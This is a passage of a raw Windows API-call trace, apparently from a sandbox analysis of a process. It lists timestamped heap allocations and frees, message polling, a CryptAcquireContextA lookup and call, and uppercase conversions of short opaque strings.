hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0263.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.593] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.593] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.594] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.598] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.598] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.599] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0263.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0263.601] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.602] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.604] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.605] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.605] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.605] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.605] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.606] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.606] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.606] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.607] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.607] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0263.607] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0263.608] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0263.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.608] RtlAllocateHeap 